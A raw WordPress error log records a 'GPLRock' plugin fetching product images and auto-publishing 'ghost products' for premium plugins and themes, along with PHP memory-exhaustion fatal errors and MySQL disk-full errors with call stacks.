Code: 526, Error: . Retrying... [02-Apr-2026 17:55:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/masterstudy-lms-mobile-app---flutter-v3-ios--android-19989.webp for product masterstudy-lms-mobile-app-flutter-v3-ios-android after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:52 UTC] GPLRock: Image download failed for product masterstudy-lms-mobile-app-flutter-v3-ios-android (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:54 UTC] GPLRock: Image download failed for product masterstudy-lms-mobile-app-flutter-v3-ios-android (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/masterstudy-lms-mobile-app---flutter-v3-ios--android-19989.webp for product masterstudy-lms-mobile-app-flutter-v3-ios-android after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:55:56 UTC] GPLRock WARNING: Image download failed for product masterstudy-lms-mobile-app-flutter-v3-ios-android. URL: https://meldwp.com/wp-content/uploads/masterstudy-lms-mobile-app---flutter-v3-ios--android-19989.webp [02-Apr-2026 17:55:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: masterstudy-lms-mobile-app-flutter-v3-ios-android [02-Apr-2026 17:55:56 UTC] GPLRock: Image download failed for product simple-virtual-tour (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:55:58 UTC] GPLRock: Image download failed for product simple-virtual-tour (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:56:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-virtual-tour-12979.webp for product simple-virtual-tour after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:56:01 UTC] GPLRock: Image download failed for product simple-virtual-tour (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:56:03 UTC] GPLRock: Image download failed for product simple-virtual-tour (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:56:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-virtual-tour-12979.webp for product simple-virtual-tour after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:56:05 UTC] GPLRock WARNING: Image download failed for product simple-virtual-tour. URL: https://meldwp.com/wp-content/uploads/simple-virtual-tour-12979.webp [02-Apr-2026 17:56:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: simple-virtual-tour [02-Apr-2026 17:56:05 UTC] GPLRock: Image download failed for product woocommerce-infusionsoft-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:56:07 UTC] GPLRock: Image download failed for product woocommerce-infusionsoft-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:56:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-infusionsoft-pro-21887.webp for product woocommerce-infusionsoft-pro after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:56:09 UTC] GPLRock: Image download failed for product woocommerce-infusionsoft-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:56:11 UTC] GPLRock: Image download failed for product woocommerce-infusionsoft-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:56:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-infusionsoft-pro-21887.webp for product woocommerce-infusionsoft-pro after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:56:13 UTC] GPLRock WARNING: Image download failed for product woocommerce-infusionsoft-pro. URL: https://meldwp.com/wp-content/uploads/woocommerce-infusionsoft-pro-21887.webp [02-Apr-2026 17:56:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-infusionsoft-pro [02-Apr-2026 17:56:14 UTC] GPLRock: Image download failed for product woocommerce-penny-sale (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:56:16 UTC] GPLRock: Image download failed for product woocommerce-penny-sale (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:56:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-penny-sale-8570.webp for product woocommerce-penny-sale after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:56:18 UTC] GPLRock: Image download failed for product woocommerce-penny-sale (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:56:20 UTC] GPLRock: Image download failed for product woocommerce-penny-sale (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 17:56:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-penny-sale-8570.webp for product woocommerce-penny-sale after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 17:56:22 UTC] GPLRock WARNING: Image download failed for product woocommerce-penny-sale. URL: https://meldwp.com/wp-content/uploads/woocommerce-penny-sale-8570.webp [02-Apr-2026 17:56:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-penny-sale [02-Apr-2026 17:56:30 UTC] GPLRock: Image downloaded successfully for product zortex-broadband-internet-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-700e998c.webp [02-Apr-2026 17:56:30 UTC] GPLRock: Using pre-downloaded image for product zortex-broadband-internet-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-700e998c.webp [02-Apr-2026 17:56:30 UTC] GPLRock: Ghost product published with image - Product ID: zortex-broadband-internet-services-elementor-template-kit [02-Apr-2026 17:56:32 UTC] GPLRock: Image downloaded successfully for product zooland-safari-zoo-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4efa2557.jpg [02-Apr-2026 17:56:33 UTC] GPLRock: Using pre-downloaded image for product zooland-safari-zoo-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4efa2557.jpg [02-Apr-2026 17:56:33 UTC] GPLRock: Ghost product published with image - Product ID: zooland-safari-zoo-elementor-template-kit [02-Apr-2026 17:56:34 UTC] GPLRock: Image downloaded successfully for product zoi-construction-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-353b2f52.jpg [02-Apr-2026 17:56:34 UTC] GPLRock: Using pre-downloaded image for product zoi-construction-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-353b2f52.jpg [02-Apr-2026 17:56:34 UTC] GPLRock: Ghost product published with image - Product ID: zoi-construction-template-kit [02-Apr-2026 17:56:36 UTC] GPLRock: Image downloaded successfully for product zocio-social-media-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-da0ea915.jpg [02-Apr-2026 17:56:36 UTC] GPLRock: Using pre-downloaded image for product zocio-social-media-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-da0ea915.jpg [02-Apr-2026 17:56:36 UTC] GPLRock: Ghost product published with image - Product ID: zocio-social-media-marketing-agency-elementor-template-kit [02-Apr-2026 17:56:37 UTC] GPLRock: Image downloaded successfully for product zitshoe-shoes-cleaning-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af1879eb.webp [02-Apr-2026 17:56:37 UTC] GPLRock: Using pre-downloaded image for product zitshoe-shoes-cleaning-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af1879eb.webp [02-Apr-2026 17:56:37 UTC] GPLRock: Ghost product published with image - Product ID: zitshoe-shoes-cleaning-service-elementor-template-kit [02-Apr-2026 17:56:39 UTC] GPLRock: Image downloaded successfully for product zinancial-finance-accounting-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-88ea2bb6.jpg [02-Apr-2026 17:56:39 UTC] GPLRock: Using pre-downloaded image for product zinancial-finance-accounting-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-88ea2bb6.jpg [02-Apr-2026 17:56:39 UTC] GPLRock: Ghost product published with image - Product ID: zinancial-finance-accounting-services-elementor-template-kit [02-Apr-2026 17:56:40 UTC] GPLRock: Image downloaded successfully for product zimmypet-pet-care-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a1077480.webp [02-Apr-2026 17:56:40 UTC] GPLRock: Using pre-downloaded image for product zimmypet-pet-care-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a1077480.webp [02-Apr-2026 17:56:40 UTC] GPLRock: Ghost product published with image - Product ID: zimmypet-pet-care-store-elementor-template-kit [02-Apr-2026 17:56:42 UTC] GPLRock: Image downloaded successfully for product ziga-healer-life-coach-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a62a7586.webp [02-Apr-2026 17:56:42 UTC] GPLRock: Using pre-downloaded image for product ziga-healer-life-coach-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a62a7586.webp [02-Apr-2026 17:56:42 UTC] GPLRock: Ghost product published with image - Product ID: ziga-healer-life-coach-elementor-template-kit [02-Apr-2026 17:56:43 UTC] GPLRock: Image downloaded successfully for product zeve-tailor-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4f1d398b.webp [02-Apr-2026 17:56:43 UTC] GPLRock: Using pre-downloaded image for product zeve-tailor-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4f1d398b.webp [02-Apr-2026 17:56:43 UTC] GPLRock: Ghost product published with image - Product ID: zeve-tailor-service-elementor-template-kit [02-Apr-2026 17:56:45 UTC] GPLRock: Image downloaded successfully for product zeus-gym-fitness-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-95368063.webp [02-Apr-2026 17:56:45 UTC] GPLRock: Using pre-downloaded image for product zeus-gym-fitness-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-95368063.webp [02-Apr-2026 17:56:45 UTC] GPLRock: Ghost product published with image - Product ID: zeus-gym-fitness-elementor-template-kit [02-Apr-2026 18:06:36 UTC] There aren't users with empty `account_status`. Maybe some users were approved manually or deleted. [02-Apr-2026 18:06:36 UTC] There aren't users with empty `account_status`. Maybe some users were approved manually or deleted. [02-Apr-2026 18:06:41 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 73728 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/autoload.php on line 27 [02-Apr-2026 18:06:41 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 36864 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Elements/Simple_Menu.php on line 720 [02-Apr-2026 18:06:43 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 167936 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/autoload.php on line 27 [02-Apr-2026 18:06:45 UTC] GPLRock: Image downloaded successfully for product memberpress-wp-simple-pay-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14863c68.jpg [02-Apr-2026 18:06:45 UTC] GPLRock: Using pre-downloaded image for product memberpress-wp-simple-pay-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14863c68.jpg [02-Apr-2026 18:06:45 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-wp-simple-pay-pro [02-Apr-2026 18:06:47 UTC] GPLRock: Image downloaded successfully for product neighborhood-responsive-multi-purpose-shop-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b638c186.jpg [02-Apr-2026 18:06:47 UTC] GPLRock: Using pre-downloaded image for product neighborhood-responsive-multi-purpose-shop-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b638c186.jpg [02-Apr-2026 18:06:47 UTC] GPLRock: Ghost product published with image - Product ID: neighborhood-responsive-multi-purpose-shop-theme [02-Apr-2026 18:06:48 UTC] GPLRock: Image downloaded successfully for product mythemeshop-cool-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e08585e.jpg [02-Apr-2026 18:06:48 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-cool-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e08585e.jpg [02-Apr-2026 18:06:49 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-cool-wordpress-theme [02-Apr-2026 18:06:51 UTC] GPLRock: Image downloaded successfully for product shadow-responsive-retina-multi-purpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ba5b4ed6.jpg [02-Apr-2026 18:06:51 UTC] GPLRock: Using pre-downloaded image for product shadow-responsive-retina-multi-purpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ba5b4ed6.jpg [02-Apr-2026 18:06:51 UTC] GPLRock: Ghost product published with image - Product ID: shadow-responsive-retina-multi-purpose-theme [02-Apr-2026 18:06:53 UTC] GPLRock: Image downloaded successfully for product age-checker-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f17aa276.jpg [02-Apr-2026 18:06:53 UTC] GPLRock: Using pre-downloaded image for product age-checker-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f17aa276.jpg [02-Apr-2026 18:06:53 UTC] GPLRock: Ghost product published with image - Product ID: age-checker-for-wordpress [02-Apr-2026 18:06:56 UTC] GPLRock: Image downloaded successfully for product yith-live-chat-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ce176370.jpg [02-Apr-2026 18:06:56 UTC] GPLRock: Using pre-downloaded image for product yith-live-chat-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ce176370.jpg [02-Apr-2026 18:06:56 UTC] GPLRock: Ghost product published with image - Product ID: yith-live-chat-premium [02-Apr-2026 18:06:58 UTC] GPLRock: Image downloaded successfully for product ninja-forms-zapier (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9a376a01.jpg [02-Apr-2026 18:06:58 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-zapier: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9a376a01.jpg [02-Apr-2026 18:06:59 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-zapier [02-Apr-2026 18:07:01 UTC] GPLRock: Image downloaded successfully for product searchwp-german-keyword-stemmer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-10c6f441.jpg [02-Apr-2026 18:07:01 UTC] GPLRock: Using pre-downloaded image for product searchwp-german-keyword-stemmer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-10c6f441.jpg [02-Apr-2026 18:07:01 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-german-keyword-stemmer [02-Apr-2026 18:07:04 UTC] GPLRock: Image downloaded successfully for product wyzi-business-finder-wordpress-directory-listing-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cab36212.jpg [02-Apr-2026 18:07:04 UTC] GPLRock: Using pre-downloaded image for product wyzi-business-finder-wordpress-directory-listing-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cab36212.jpg [02-Apr-2026 18:07:04 UTC] GPLRock: Ghost product published with image - Product ID: wyzi-business-finder-wordpress-directory-listing-theme [02-Apr-2026 18:07:06 UTC] GPLRock: Image downloaded successfully for product elmastudio-namba-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2cfa826b.jpg [02-Apr-2026 18:07:06 UTC] GPLRock: Using pre-downloaded image for product elmastudio-namba-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2cfa826b.jpg [02-Apr-2026 18:07:06 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-namba-wordpress-theme [02-Apr-2026 18:07:31 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 73728 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/autoload.php on line 27 [02-Apr-2026 18:07:35 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 73728 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/autoload.php on line 27 [02-Apr-2026 18:07:47 UTC] GPLRock: Image downloaded successfully for product e2pdf-export-to-pdf-tool-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-face3be7.png [02-Apr-2026 18:07:47 UTC] GPLRock: Using pre-downloaded image for product e2pdf-export-to-pdf-tool-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-face3be7.png [02-Apr-2026 18:07:47 UTC] GPLRock: Ghost product published with image - Product ID: e2pdf-export-to-pdf-tool-for-wordpress [02-Apr-2026 18:07:48 UTC] GPLRock: Image downloaded successfully for product wp-data-access-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6cb8a630.png [02-Apr-2026 18:07:48 UTC] GPLRock: Using pre-downloaded image for product wp-data-access-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6cb8a630.png [02-Apr-2026 18:07:48 UTC] GPLRock: Ghost product published with image - Product ID: wp-data-access-premium [02-Apr-2026 18:07:50 UTC] GPLRock: Image downloaded successfully for product nextend-social-login-pro-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4300ea3.webp [02-Apr-2026 18:07:50 UTC] GPLRock: Using pre-downloaded image for product nextend-social-login-pro-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4300ea3.webp [02-Apr-2026 18:07:50 UTC] GPLRock: Ghost product published with image - Product ID: nextend-social-login-pro-addon [02-Apr-2026 18:07:52 UTC] GPLRock: Image downloaded successfully for product lebuild-construction-industry-company-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d8605bad.jpg [02-Apr-2026 18:07:52 UTC] GPLRock: Using pre-downloaded image for product lebuild-construction-industry-company-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d8605bad.jpg [02-Apr-2026 18:07:52 UTC] GPLRock: Ghost product published with image - Product ID: lebuild-construction-industry-company-wordpress-theme [02-Apr-2026 18:07:53 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-bulk-product-editing-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-64f8358b.jpg [02-Apr-2026 18:07:53 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-bulk-product-editing-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-64f8358b.jpg [02-Apr-2026 18:07:53 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-bulk-product-editing-premium [02-Apr-2026 18:07:55 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-checkout-manager-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-81abe071.jpg [02-Apr-2026 18:07:55 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-checkout-manager-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-81abe071.jpg [02-Apr-2026 18:07:55 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-checkout-manager-premium [02-Apr-2026 18:07:57 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-added-to-cart-popup-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f505a24d.jpg [02-Apr-2026 18:07:57 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-added-to-cart-popup-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f505a24d.jpg [02-Apr-2026 18:07:57 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-added-to-cart-popup-premium [02-Apr-2026 18:07:59 UTC] GPLRock: Image downloaded successfully for product saasland-multipurpose-wordpress-theme-for-startup (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aff9847e.jpg [02-Apr-2026 18:07:59 UTC] GPLRock: Using pre-downloaded image for product saasland-multipurpose-wordpress-theme-for-startup: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aff9847e.jpg [02-Apr-2026 18:07:59 UTC] GPLRock: Ghost product published with image - Product ID: saasland-multipurpose-wordpress-theme-for-startup [02-Apr-2026 18:08:01 UTC] GPLRock: Image downloaded successfully for product youzer-community-user-profiles-management (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-699ba45a.jpg [02-Apr-2026 18:08:01 UTC] GPLRock: Using pre-downloaded image for product youzer-community-user-profiles-management: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-699ba45a.jpg [02-Apr-2026 18:08:01 UTC] GPLRock: Ghost product published with image - Product ID: youzer-community-user-profiles-management [02-Apr-2026 18:08:03 UTC] GPLRock: Image downloaded successfully for product woocommerce-sagepay-form-sagepay-direct (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-633ab657.jpg [02-Apr-2026 18:08:03 UTC] GPLRock: Using pre-downloaded image for product woocommerce-sagepay-form-sagepay-direct: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-633ab657.jpg [02-Apr-2026 18:08:03 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-sagepay-form-sagepay-direct [02-Apr-2026 18:10:48 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 5242880 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/vendor/elementor/wp-one-package/src/Admin/Components/Fields.php on line 80 [02-Apr-2026 18:12:49 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707b43-1d98a.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:05 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707d0f-e2d3.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707d37-bc9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:07 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707d56-c5f.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:12 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707dfa-2d6da.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:14 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e04-cb4.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->check_auto_publish_on_init, set_transient, update_option [02-Apr-2026 18:13:14 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e04-cb5.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->check_auto_publish_on_init, set_transient, update_option [02-Apr-2026 18:13:14 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e04-cb6.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->check_auto_publish_on_init, GPLRock\Core->handle_auto_publish, GPLRock\Core->log [02-Apr-2026 18:13:14 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e05-25b17.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:14 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e09-cd9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:15 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707e09-cdb.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:13:15 UTC] 